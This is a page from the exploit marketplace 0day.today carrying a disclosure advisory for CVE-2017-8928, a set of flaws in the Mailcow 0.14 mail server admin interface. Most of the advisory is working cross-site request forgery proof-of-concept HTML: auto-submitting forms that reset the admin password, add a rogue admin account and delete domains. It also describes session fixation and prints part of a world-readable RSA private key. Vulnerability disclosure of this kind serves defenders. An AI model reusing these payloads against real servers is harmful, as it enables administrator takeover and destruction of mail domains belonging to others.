0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Mailcow 0.14 - Cross-Site Request Forgery Vulnerability
Author
Risk
[
Security Risk Low
]0day-ID
Category
Date add
CVE
Platform
[+] Credits: John Page a.k.a hyp3rlinx Vendor: ============= mailcow.email mailcow.github.io Product: =========== The integrated mailcow UI allows administrative work on your mail server instance as well as separated domain administrator and mailbox user access. Vulnerability Type: =================== CSRF Password Reset / Add Admin / Delete Domains CVE Reference: ============== CVE-2017-8928 Security Issue: ================ mailcow 0.14, as used in "mailcow: dockerized" and other products, has CSRF vulnerabilities. If authenticated mailcow user visits a malicious webpage remote attackers can execute the following exploits. 1) reset admin password 2) add arbitrary admin 3) delete domains Other issues found in mailcow are as follows: Session fixation: ================= Session ID: Pre authentication and Post auth is the same, and does not change upon successful login. ms22jsnl1dcpc4519rvpvfj0n6 - pre-authentication ms22jsnl1dcpc4519rvpvfj0n6 - post-authentication World Readable Private key "key.pem" ==================================== john@debian:/usr/local/mailcow-dockerized-master/data/assets/ssl$ whoami john john@debian:/usr/local/mailcow-dockerized-master/data/assets/ssl$ cat key.pem -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEA0YNMU9wLfQ0m9x+TjKdytTKVwIGMqLUiuk0utXwtEBB8tnzF 4sLOwIHMnui5+whutxXtXjdo5HZXn8vcSYr0vMucNDPItevL+c58wvH58pS9ojok mHyvwf6BKn1O2B+EXHoDud6AwyFGZouBa4J7u9/VVTlNWchxFahidh9mgCJKGUYx s7pg/WJuC1honbSicwYBbf6poVHll4qTPMNvNV5EJyVO/fsdssJyUrxGd6/2VSQu 5G44lcPv5NeZPQsZOiJPMJidF//sVsaGaJh0CNSzNFSgEv4mlPeXZ9m6Zby+o04o slgG6zI0irOF2z7f3yGzonDZI+vghctDFX8shwIDAQABAoIBAQC9kiLnIgxXGyZt pmmYdA6re1jatZ2zLSp+DcY8ul3/0hs195IKCyCOOSQPiR520Pt0t+duP46uYZIJ etc... References: ============ https://github.com/mailcow/mailcow-dockerized/pull/268/commits/3c937f75ba5853ada175542d5c4849fb95eb64cd Exploit/POC: ============= [Admin Password Reset] <form action="https://localhost/admin.php" method="post"> <input type="hidden" name="admin_user_now" value="admin"> <input type="hidden" name="admin_user" value="admin"> <input type="hidden" name="admin_pass" value="Abc12345"> <input type="hidden" name="admin_pass2" value="Abc12345"> <input type="hidden" name="trigger_set_admin" value=""> <script>document.forms[0].submit()</script> </form> HTTP Response: 'Changes to administrator have been saved" ////////////////////// [Add Admin] <form action="https://localhost/admin.php" method="post"> <input type="hidden" name="username" value="HELL"> <input type="hidden" name="password" value="Abc12345"> <input type="hidden" name="password2" value="Abc12345"> <input type="hidden" name="active" value="on"> <input type="hidden" name="trigger_add_domain_admin" value="localhost"> <script>document.forms[0].submit()</script> </form> //////////////////// [Delete domains] https://localhost/mailbox.php domain=myDomain&trigger_mailbox_action=deletedomain # 0day.today [2024-09-29] #